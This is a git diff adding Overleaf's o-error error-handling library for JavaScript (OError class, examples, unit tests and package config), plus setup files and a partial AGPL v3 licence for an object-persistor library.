+    return `Hi ${user.name}`
+  } catch (error) {
+    if (error.message === 'not found') {
+      throw new UserNotFoundError(userId).withCause(error)
+    }
+    throw error // don't silently swallow errors we don't recognise
+  }
+}
+
+async function main2() {
+  try {
+    await sayHi5(43)
+  } catch (error) {
+    OError.tag(error, 'failed to say hi')
+    console.error(OError.getFullStack(error))
+    console.error(OError.getFullInfo(error))
+  }
+}
+main2()
diff --git a/libraries/o-error/index.cjs b/libraries/o-error/index.cjs
new file mode 100644
index 0000000..ef08b45
--- /dev/null
+++ b/libraries/o-error/index.cjs
@@ -0,0 +1,190 @@
+/**
+ * Light-weight helpers for handling JavaScript Errors in node.js and the
+ * browser.
+ */
+class OError extends Error {
+  /**
+   * @param {string} message as for built-in Error
+   * @param {Object} [info] extra data to attach to the error
+   * @param {Error} [cause] the internal error that caused this error
+   */
+  constructor(message, info, cause) {
+    super(message)
+    this.name = this.constructor.name
+    if (info) this.info = info
+    if (cause) this.cause = cause
+    /** @private @type {Array<TaggedError> | undefined} */
+    this._oErrorTags // eslint-disable-line
+  }
+
+  /**
+   * Set the extra info object for this error.
+   *
+   * @param {Object} info extra data to attach to the error
+   * @return {this}
+   */
+  withInfo(info) {
+    this.info = info
+    return this
+  }
+
+  /**
+   * Wrap the given error, which caused this error.
+   *
+   * @param {Error} cause the internal error that caused this error
+   * @return {this}
+   */
+  withCause(cause) {
+    this.cause = cause
+    return this
+  }
+
+  /**
+   * Tag debugging information onto any error (whether an OError or not) and
+   * return it.
+   *
+   * @example An error in a callback
+   * function findUser(name, callback) {
+   *   fs.readFile('/etc/passwd', (err, data) => {
+   *     if (err) return callback(OError.tag(err, 'failed to read passwd'))
+   *     // ...
+   *   })
+   * }
+   *
+   * @example A possible error in a callback
+   * function cleanup(callback) {
+   *   fs.unlink('/tmp/scratch', (err) => callback(err && OError.tag(err)))
+   * }
+   *
+   * @example An error with async/await
+   * async function cleanup() {
+   *   try {
+   *     await fs.promises.unlink('/tmp/scratch')
+   *   } catch (err) {
+   *     throw OError.tag(err, 'failed to remove scratch file')
+   *   }
+   * }
+   *
+   * @param {Error} error the error to tag
+   * @param {string} [message] message with which to tag `error`
+   * @param {Object} [info] extra data with which to tag `error`
+   * @return {Error} the modified `error` argument
+   */
+  static tag(error, message, info) {
+    const oError = /** @type{OError} */ (error)
+
+    if (!oError._oErrorTags) oError._oErrorTags = []
+
+    let tag
+    if (Error.captureStackTrace) {
+      // Hide this function in the stack trace, and avoid capturing it twice.
+      tag = /** @type TaggedError */ ({ name: 'TaggedError', message, info })
+      Error.captureStackTrace(tag, OError.tag)
+    } else {
+      tag = new TaggedError(message || '', info)
+    }
+
+    if (oError._oErrorTags.length >= OError.maxTags) {
+      // Preserve the first tag and add an indicator that we dropped some tags.
+      if (oError._oErrorTags[1] === DROPPED_TAGS_ERROR) {
+        oError._oErrorTags.splice(2, 1)
+      } else {
+        oError._oErrorTags[1] = DROPPED_TAGS_ERROR
+      }
+    }
+    oError._oErrorTags.push(tag)
+
+    return error
+  }
+
+  /**
+   * The merged info from any `tag`s and causes on the given error.
+   *
+   * If an info property is repeated, the last one wins.
+   *
+   * @param {Error | null | undefined} error any error (may or may not be an `OError`)
+   * @return {Object}
+   */
+  static getFullInfo(error) {
+    const info = {}
+
+    if (!error) return info
+
+    const oError = /** @type{OError} */ (error)
+
+    if (oError.cause) Object.assign(info, OError.getFullInfo(oError.cause))
+
+    if (typeof oError.info === 'object') Object.assign(info, oError.info)
+
+    if (oError._oErrorTags) {
+      for (const tag of oError._oErrorTags) {
+        Object.assign(info, tag.info)
+      }
+    }
+
+    return info
+  }
+
+  /**
+   * Return the `stack` property from `error`, including the `stack`s for any
+   * tagged errors added with `OError.tag` and for any `cause`s.
+   *
+   * @param {Error | null | undefined} error any error (may or may not be an `OError`)
+   * @return {string}
+   */
+  static getFullStack(error) {
+    if (!error) return ''
+
+    const oError = /** @type{OError} */ (error)
+
+    let stack = oError.stack || oError.message || '(no stack)'
+
+    if (Array.isArray(oError._oErrorTags) && oError._oErrorTags.length) {
+      stack += `\n${oError._oErrorTags.map(tag => tag.stack).join('\n')}`
+    }
+
+    const causeStack = oError.cause && OError.getFullStack(oError.cause)
+    if (causeStack) {
+      stack += '\ncaused by:\n' + indent(causeStack)
+    }
+
+    return stack
+  }
+}
+
+/**
+ * Maximum number of tags to apply to any one error instance. This is to avoid
+ * a resource leak in the (hopefully unlikely) case that a singleton error
+ * instance is returned to many callbacks. If tags have been dropped, the full
+ * stack trace will include a placeholder tag `... dropped tags`.
+ *
+ * Defaults to 100. Must be at least 1.
+ *
+ * @type {Number}
+ */
+OError.maxTags = 100
+
+/**
+ * Used to record a stack trace every time we tag info onto an Error.
+ *
+ * @private
+ * @extends OError
+ */
+class TaggedError extends OError {}
+
+const DROPPED_TAGS_ERROR = /** @type{TaggedError} */ ({
+  name: 'TaggedError',
+  message: '... dropped tags',
+  stack: 'TaggedError: ... dropped tags',
+})
+
+/**
+ * @private
+ * @param {string} string
+ * @return {string}
+ */
+function indent(string) {
+  return string.replace(/^/gm, '    ')
+}
+
+module.exports = OError
diff --git a/libraries/o-error/package.json b/libraries/o-error/package.json
new file mode 100644
index 0000000..9e17e85
--- /dev/null
+++ b/libraries/o-error/package.json
@@ -0,0 +1,40 @@
+{
+  "name": "@overleaf/o-error",
+  "version": "3.4.0",
+  "description": "Light-weight helpers for handling JavaScript Errors in node.js and the browser. Helps with long stack traces, Error subclasses, wrapping internal errors (causes), and attaching extra data to errors for logging.",
+  "keywords": [
+    "browser",
+    "node",
+    "error",
+    "long stack trace",
+    "stack trace",
+    "stack",
+    "cause",
+    "verror"
+  ],
+  "main": "index.cjs",
+  "files": [
+    "index.cjs"
+  ],
+  "scripts": {
+    "build": "npm run --silent test",
+    "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .",
+    "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .",
+    "test": "npm run lint && npm run format && npm run types:check && npm run test:unit",
+    "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'",
+    "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'",
+    "test:ci": "npm run test:unit",
+    "test:unit": "mocha --exit test/**/*.{js,cjs}",
+    "types:check": "tsc --noEmit"
+  },
+  "author": "Overleaf (https://www.overleaf.com)",
+  "license": "MIT",
+  "repository": "github:overleaf/o-error",
+  "devDependencies": {
+    "@types/chai": "^4.3.0",
+    "@types/node": "^18.17.4",
+    "chai": "^4.3.6",
+    "mocha": "^11.1.0",
+    "typescript": "^5.0.4"
+  }
+}
diff --git a/libraries/o-error/test/o-error-util.test.js b/libraries/o-error/test/o-error-util.test.js
new file mode 100644
index 0000000..c86cec4
--- /dev/null
+++ b/libraries/o-error/test/o-error-util.test.js
@@ -0,0 +1,425 @@
+const { expect } = require('chai')
+const { promisify } = require('node:util')
+
+const OError = require('..')
+
+const {
+  expectError,
+  expectFullStackWithoutStackFramesToEqual,
+} = require('./support')
+
+describe('utils', function () {
+  describe('OError.tag', function () {
+    it('tags errors thrown from an async function', async function () {
+      const delay = promisify(setTimeout)
+
+      async function foo() {
+        await delay(10)
+        throw new Error('foo error')
+      }
+
+      async function bar() {
+        try {
+          await foo()
+        } catch (error) {
+          throw OError.tag(error, 'failed to bar', { bar: 'baz' })
+        }
+      }
+
+      async function baz() {
+        try {
+          await bar()
+        } catch (error) {
+          throw OError.tag(error, 'failed to baz', { baz: 'bat' })
+        }
+      }
+
+      try {
+        await baz()
+        expect.fail('should have thrown')
+      } catch (error) {
+        expectError(error, {
+          name: 'Error',
+          klass: Error,
+          message: 'Error: foo error',
+          firstFrameRx: /at foo/,
+        })
+        expectFullStackWithoutStackFramesToEqual(error, [
+          'Error: foo error',
+          'TaggedError: failed to bar',
+          'TaggedError: failed to baz',
+        ])
+        expect(OError.getFullInfo(error)).to.eql({
+          bar: 'baz',
+          baz: 'bat',
+        })
+      }
+    })
+
+    it('tags errors thrown from a promise rejection', async function () {
+      function foo() {
+        return new Promise((resolve, reject) => {
+          setTimeout(() => {
+            reject(new Error('foo error'))
+          }, 10)
+        })
+      }
+
+      async function bar() {
+        try {
+          await foo()
+        } catch (error) {
+          throw OError.tag(error, 'failed to bar', { bar: 'baz' })
+        }
+      }
+
+      async function baz() {
+        try {
+          await bar()
+        } catch (error) {
+          throw OError.tag(error, 'failed to baz', { baz: 'bat' })
+        }
+      }
+
+      try {
+        await baz()
+        expect.fail('should have thrown')
+      } catch (error) {
+        expectError(error, {
+          name: 'Error',
+          klass: Error,
+          message: 'Error: foo error',
+          firstFrameRx: /_onTimeout/,
+        })
+        expectFullStackWithoutStackFramesToEqual(error, [
+          'Error: foo error',
+          'TaggedError: failed to bar',
+          'TaggedError: failed to baz',
+        ])
+        expect(OError.getFullInfo(error)).to.eql({
+          bar: 'baz',
+          baz: 'bat',
+        })
+      }
+    })
+
+    it('tags errors yielded through callbacks', function (done) {
+      function foo(cb) {
+        setTimeout(() => {
+          cb(new Error('foo error'))
+        }, 10)
+      }
+
+      function bar(cb) {
+        foo(err => {
+          if (err) {
+            return cb(OError.tag(err, 'failed to bar', { bar: 'baz' }))
+          }
+          cb()
+        })
+      }
+
+      function baz(cb) {
+        bar(err => {
+          if (err) {
+            return cb(OError.tag(err, 'failed to baz', { baz: 'bat' }))
+          }
+          cb()
+        })
+      }
+
+      baz(err => {
+        if (err) {
+          expectError(err, {
+            name: 'Error',
+            klass: Error,
+            message: 'Error: foo error',
+            firstFrameRx: /_onTimeout/,
+          })
+          expectFullStackWithoutStackFramesToEqual(err, [
+            'Error: foo error',
+            'TaggedError: failed to bar',
+            'TaggedError: failed to baz',
+          ])
+          expect(OError.getFullInfo(err)).to.eql({
+            bar: 'baz',
+            baz: 'bat',
+          })
+          return done()
+        }
+        expect.fail('should have yielded an error')
+      })
+    })
+
+    it('is not included in the stack trace if using capture', function () {
+      if (!Error.captureStackTrace) return this.skip()
+      const err = new Error('test error')
+      OError.tag(err, 'test message')
+      const stack = OError.getFullStack(err)
+      expect(stack).to.match(/TaggedError: test message\n\s+at/)
+      expect(stack).to.not.match(/TaggedError: test message\n\s+at [\w.]*tag/)
+    })
+
+    describe('without Error.captureStackTrace', function () {
+      /* eslint-disable mocha/no-hooks-for-single-case */
+      before(function () {
+        this.originalCaptureStackTrace = Error.captureStackTrace
+        Error.captureStackTrace = null
+      })
+      after(function () {
+        Error.captureStackTrace = this.originalCaptureStackTrace
+      })
+
+      it('still captures a stack trace, albeit including itself', function () {
+        const err = new Error('test error')
+        OError.tag(err, 'test message')
+        expectFullStackWithoutStackFramesToEqual(err, [
+          'Error: test error',
+          'TaggedError: test message',
+        ])
+        const stack = OError.getFullStack(err)
+        expect(stack).to.match(/TaggedError: test message\n\s+at [\w.]*tag/)
+      })
+    })
+
+    describe('with limit on the number of tags', function () {
+      before(function () {
+        this.originalMaxTags = OError.maxTags
+        OError.maxTags = 3
+      })
+      after(function () {
+        OError.maxTags = this.originalMaxTags
+      })
+
+      it('should not tag more than that', function () {
+        const err = new Error('test error')
+        OError.tag(err, 'test message 1')
+        OError.tag(err, 'test message 2')
+        OError.tag(err, 'test message 3')
+        OError.tag(err, 'test message 4')
+        OError.tag(err, 'test message 5')
+        expectFullStackWithoutStackFramesToEqual(err, [
+          'Error: test error',
+          'TaggedError: test message 1',
+          'TaggedError: ... dropped tags',
+          'TaggedError: test message 4',
+          'TaggedError: test message 5',
+        ])
+      })
+
+      it('should handle deep recursion', async function () {
+        async function recursiveAdd(n) {
+          try {
+            if (n === 0) throw new Error('deep error')
+            const result = await recursiveAdd(n - 1)
+            return result + 1
+          } catch (err) {
+            throw OError.tag(err, `at level ${n}`)
+          }
+        }
+
+        try {
+          await recursiveAdd(10)
+        } catch (err) {
+          expectFullStackWithoutStackFramesToEqual(err, [
+            'Error: deep error',
+            'TaggedError: at level 0',
+            'TaggedError: ... dropped tags',
+            'TaggedError: at level 9',
+            'TaggedError: at level 10',
+          ])
+        }
+      })
+
+      it('should handle a singleton error', function (done) {
+        const err = new Error('singleton error')
+
+        function endpoint(callback) {
+          helper(err => callback(err && OError.tag(err, 'in endpoint')))
+        }
+
+        function helper(callback) {
+          libraryFunction(err => callback(err && OError.tag(err, 'in helper')))
+        }
+
+        function libraryFunction(callback) {
+          callback(err)
+        }
+
+        endpoint(() => {
+          endpoint(err => {
+            expect(err).to.exist
+            expectFullStackWithoutStackFramesToEqual(err, [
+              'Error: singleton error',
+              'TaggedError: in helper',
+              'TaggedError: ... dropped tags',
+              'TaggedError: in helper',
+              'TaggedError: in endpoint',
+            ])
+            done()
+          })
+        })
+      })
+    })
+  })
+
+  describe('OError.getFullInfo', function () {
+    it('works when given null', function () {
+      expect(OError.getFullInfo(null)).to.deep.equal({})
+    })
+
+    it('works on a normal error', function () {
+      const err = new Error('foo')
+      expect(OError.getFullInfo(err)).to.deep.equal({})
+    })
+
+    it('works on an error with tags', function () {
+      const err = OError.tag(new Error('foo'), 'bar', { userId: 123 })
+      expect(OError.getFullInfo(err)).to.deep.equal({ userId: 123 })
+    })
+
+    it('merges info from an error and its tags', function () {
+      const err = new OError('foo').withInfo({ projectId: 456 })
+      OError.tag(err, 'failed to foo', { userId: 123 })
+      expect(OError.getFullInfo(err)).to.deep.equal({
+        projectId: 456,
+        userId: 123,
+      })
+    })
+
+    it('merges info from a cause', function () {
+      const err1 = new Error('foo')
+      const err2 = new Error('bar')
+      err1.cause = err2
+      err2.info = { userId: 123 }
+      expect(OError.getFullInfo(err1)).to.deep.equal({ userId: 123 })
+    })
+
+    it('merges info from a nested cause', function () {
+      const err1 = new Error('foo')
+      const err2 = new Error('bar')
+      const err3 = new Error('baz')
+      err1.cause = err2
+      err2.info = { userId: 123 }
+      err2.cause = err3
+      err3.info = { foo: 42 }
+      expect(OError.getFullInfo(err1)).to.deep.equal({
+        userId: 123,
+        foo: 42,
+      })
+    })
+
+    it('merges info from cause with duplicate keys', function () {
+      const err1 = new Error('foo')
+      const err2 = new Error('bar')
+      err1.info = { userId: 42, foo: 1337 }
+      err1.cause = err2
+      err2.info = { userId: 1 }
+      expect(OError.getFullInfo(err1)).to.deep.equal({
+        userId: 42,
+        foo: 1337,
+      })
+    })
+
+    it('merges info from tags with duplicate keys', function () {
+      const err1 = OError.tag(new Error('foo'), 'bar', { userId: 123 })
+      const err2 = OError.tag(err1, 'bat', { userId: 456 })
+      expect(OError.getFullInfo(err2)).to.deep.equal({ userId: 456 })
+    })
+
+    it('works on an error with .info set to a string', function () {
+      const err = new Error('foo')
+      err.info = 'test'
+      expect(OError.getFullInfo(err)).to.deep.equal({})
+    })
+  })
+
+  describe('OError.getFullStack', function () {
+    it('works when given null', function () {
+      expect(OError.getFullStack(null)).to.equal('')
+    })
+
+    it('works on a normal error', function () {
+      const err = new Error('foo')
+      const fullStack = OError.getFullStack(err)
+      expect(fullStack).to.match(/^Error: foo$/m)
+      expect(fullStack).to.match(/^\s+at /m)
+    })
+
+    it('works on an error with a cause', function () {
+      const err1 = new Error('foo')
+      const err2 = new Error('bar')
+      err1.cause = err2
+
+      const fullStack = OError.getFullStack(err1)
+      expect(fullStack).to.match(/^Error: foo$/m)
+      expect(fullStack).to.match(/^\s+at /m)
+      expect(fullStack).to.match(/^caused by:\n\s+Error: bar$/m)
+    })
+
+    it('works on both tags and causes', async function () {
+      // Here's the actual error.
+      function tryToFoo() {
+        try {
+          throw Error('foo')
+        } catch (error) {
+          throw OError.tag(error, 'failed to foo', { foo: 1 })
+        }
+      }
+
+      // Inside another function that wraps it.
+      function tryToBar() {
+        try {
+          tryToFoo()
+        } catch (error) {
+          throw new OError('failed to bar').withCause(error)
+        }
+      }
+
+      // And it is in another try.
+      try {
+        try {
+          tryToBar()
+          expect.fail('should have thrown')
+        } catch (error) {
+          throw OError.tag(error, 'failed to bat', { bat: 1 })
+        }
+      } catch (error) {
+        // We catch the wrapping error.
+        expectError(error, {
+          name: 'OError',
+          klass: OError,
+          message: 'OError: failed to bar',
+          firstFrameRx: /tryToBar/,
+        })
+
+        // But the stack contains all of the errors and tags.
+        expectFullStackWithoutStackFramesToEqual(error, [
+          'OError: failed to bar',
+          'TaggedError: failed to bat',
+          'caused by:',
+          '    Error: foo',
+          '    TaggedError: failed to foo',
+        ])
+
+        // The info from the wrapped cause should be picked up for logging.
+        expect(OError.getFullInfo(error)).to.eql({ bat: 1, foo: 1 })
+
+        // But it should still be recorded.
+        expect(OError.getFullInfo(error.cause)).to.eql({ foo: 1 })
+      }
+    })
+
+    it('works when given non Error', function () {
+      expect(OError.getFullStack({ message: 'Foo' })).to.equal('Foo')
+    })
+
+    it('works when given non Error with tags', function () {
+      const error = OError.tag({ message: 'Foo: bar' }, 'baz')
+      expectFullStackWithoutStackFramesToEqual(error, [
+        'Foo: bar',
+        'TaggedError: baz',
+      ])
+    })
+  })
+})
diff --git a/libraries/o-error/test/o-error.test.js b/libraries/o-error/test/o-error.test.js
new file mode 100644
index 0000000..84244ec
--- /dev/null
+++ b/libraries/o-error/test/o-error.test.js
@@ -0,0 +1,111 @@
+const { expect } = require('chai')
+
+const OError = require('..')
+const {
+  expectError,
+  expectFullStackWithoutStackFramesToEqual,
+} = require('./support')
+
+class CustomError1 extends OError {
+  constructor() {
+    super('failed to foo')
+  }
+}
+
+class CustomError2 extends OError {
+  constructor(customMessage) {
+    super(customMessage || 'failed to bar')
+  }
+}
+
+describe('OError', function () {
+  it('can have an info object', function () {
+    const err1 = new OError('foo', { foo: 1 })
+    expect(err1.info).to.eql({ foo: 1 })
+
+    const err2 = new OError('foo').withInfo({ foo: 2 })
+    expect(err2.info).to.eql({ foo: 2 })
+  })
+
+  it('can have a cause', function () {
+    const err1 = new OError('foo', { foo: 1 }, new Error('cause 1'))
+    expect(err1.cause.message).to.equal('cause 1')
+
+    const err2 = new OError('foo').withCause(new Error('cause 2'))
+    expect(err2.cause.message).to.equal('cause 2')
+  })
+
+  it('handles a custom error type with a cause', function () {
+    function doSomethingBadInternally() {
+      throw new Error('internal error')
+    }
+
+    function doSomethingBad() {
+      try {
+        doSomethingBadInternally()
+      } catch (error) {
+        throw new CustomError1().withCause(error)
+      }
+    }
+
+    try {
+      doSomethingBad()
+      expect.fail('should have thrown')
+    } catch (error) {
+      expectError(error, {
+        name: 'CustomError1',
+        klass: CustomError1,
+        message: 'CustomError1: failed to foo',
+        firstFrameRx: /doSomethingBad/,
+      })
+      expect(OError.getFullInfo(error)).to.deep.equal({})
+      expectFullStackWithoutStackFramesToEqual(error, [
+        'CustomError1: failed to foo',
+        'caused by:',
+        '    Error: internal error',
+      ])
+    }
+  })
+
+  it('handles a custom error type with nested causes', function () {
+    function doSomethingBadInternally() {
+      throw new Error('internal error')
+    }
+
+    function doBar() {
+      try {
+        doSomethingBadInternally()
+      } catch (error) {
+        throw new CustomError2('failed to bar!').withCause(error)
+      }
+    }
+
+    function doFoo() {
+      try {
+        doBar()
+      } catch (error) {
+        throw new CustomError1().withCause(error)
+      }
+    }
+
+    try {
+      doFoo()
+      expect.fail('should have thrown')
+    } catch (error) {
+      expectError(error, {
+        name: 'CustomError1',
+        klass: CustomError1,
+        message: 'CustomError1: failed to foo',
+        firstFrameRx: /doFoo/,
+      })
+      expectFullStackWithoutStackFramesToEqual(error, [
+        'CustomError1: failed to foo',
+        'caused by:',
+        '    CustomError2: failed to bar!',
+        '    caused by:',
+        '        Error: internal error',
+      ])
+      expect(OError.getFullInfo(error)).to.deep.equal({})
+    }
+  })
+})
diff --git a/libraries/o-error/test/support/index.js b/libraries/o-error/test/support/index.js
new file mode 100644
index 0000000..00d9dbb
--- /dev/null
+++ b/libraries/o-error/test/support/index.js
@@ -0,0 +1,61 @@
+const { expect } = require('chai')
+
+const OError = require('../..')
+
+/**
+ * @param {Error} e
+ * @param {any} expected
+ */
+exports.expectError = function OErrorExpectError(e, expected) {
+  expect(
+    e.name,
+    "error should set the name property to the error's name"
+  ).to.equal(expected.name)
+
+  expect(
+    e instanceof expected.klass,
+    'error should be an instance of the error type'
+  ).to.be.true
+
+  expect(
+    e instanceof Error,
+    'error should be an instance of the built-in Error type'
+  ).to.be.true
+
+  expect(
+    require('node:util').types.isNativeError(e),
+    'error should be recognised by util.types.isNativeError'
+  ).to.be.true
+
+  expect(
+    e.toString(),
+    'toString should return the default error message formatting'
+  ).to.equal(expected.message)
+
+  expect(e.stack, 'error should have a stack trace').to.not.be.empty
+
+  expect(
+    /** @type {string} */ (e.stack).split('\n')[0],
+    'stack should start with the default error message formatting'
+  ).to.match(new RegExp(`^${expected.name}:`))
+
+  expect(
+    /** @type {string} */ (e.stack).split('\n')[1],
+    'first stack frame should be the function where the error was thrown'
+  ).to.match(expected.firstFrameRx)
+}
+
+/**
+ * @param {Error} error
+ * @param {String[]} expected
+ */
+exports.expectFullStackWithoutStackFramesToEqual = function (error, expected) {
+  const fullStack = OError.getFullStack(error)
+  const fullStackWithoutFrames = fullStack
+    .split('\n')
+    .filter(line => !/^\s+at\s/.test(line))
+  expect(
+    fullStackWithoutFrames,
+    'full stack without frames should equal'
+  ).to.deep.equal(expected)
+}
diff --git a/libraries/o-error/tsconfig.json b/libraries/o-error/tsconfig.json
new file mode 100644
index 0000000..d43bb24
--- /dev/null
+++ b/libraries/o-error/tsconfig.json
@@ -0,0 +1,7 @@
+{
+  "extends": "../../tsconfig.backend.json",
+  "include": [
+    "**/*.js",
+    "**/*.cjs"
+  ]
+}
diff --git a/libraries/object-persistor/.gitignore b/libraries/object-persistor/.gitignore
new file mode 100644
index 0000000..6a20893
--- /dev/null
+++ b/libraries/object-persistor/.gitignore
@@ -0,0 +1,4 @@
+/node_modules
+*.swp
+
+.npmrc
diff --git a/libraries/object-persistor/.mocharc.json b/libraries/object-persistor/.mocharc.json
new file mode 100644
index 0000000..c212143
--- /dev/null
+++ b/libraries/object-persistor/.mocharc.json
@@ -0,0 +1,6 @@
+{
+  "ui": "bdd",
+  "recursive": "true",
+  "reporter": "spec",
+  "require": "./test/Init"
+}
diff --git a/libraries/object-persistor/.nvmrc b/libraries/object-persistor/.nvmrc
new file mode 100644
index 0000000..0254b1e
--- /dev/null
+++ b/libraries/object-persistor/.nvmrc
@@ -0,0 +1 @@
+20.18.2
diff --git a/libraries/object-persistor/.prettierignore b/libraries/object-persistor/.prettierignore
new file mode 100644
index 0000000..3c3629e
--- /dev/null
+++ b/libraries/object-persistor/.prettierignore
@@ -0,0 +1 @@
+node_modules
diff --git a/libraries/object-persistor/LICENSE b/libraries/object-persistor/LICENSE
new file mode 100644
index 0000000..ac8619d
--- /dev/null
+++ b/libraries/object-persistor/LICENSE
@@ -0,0 +1,662 @@
+
+                    GNU AFFERO GENERAL PUBLIC LICENSE
+                       Version 3, 19 November 2007
+ + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. 
For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. 
+ + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. 
You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + 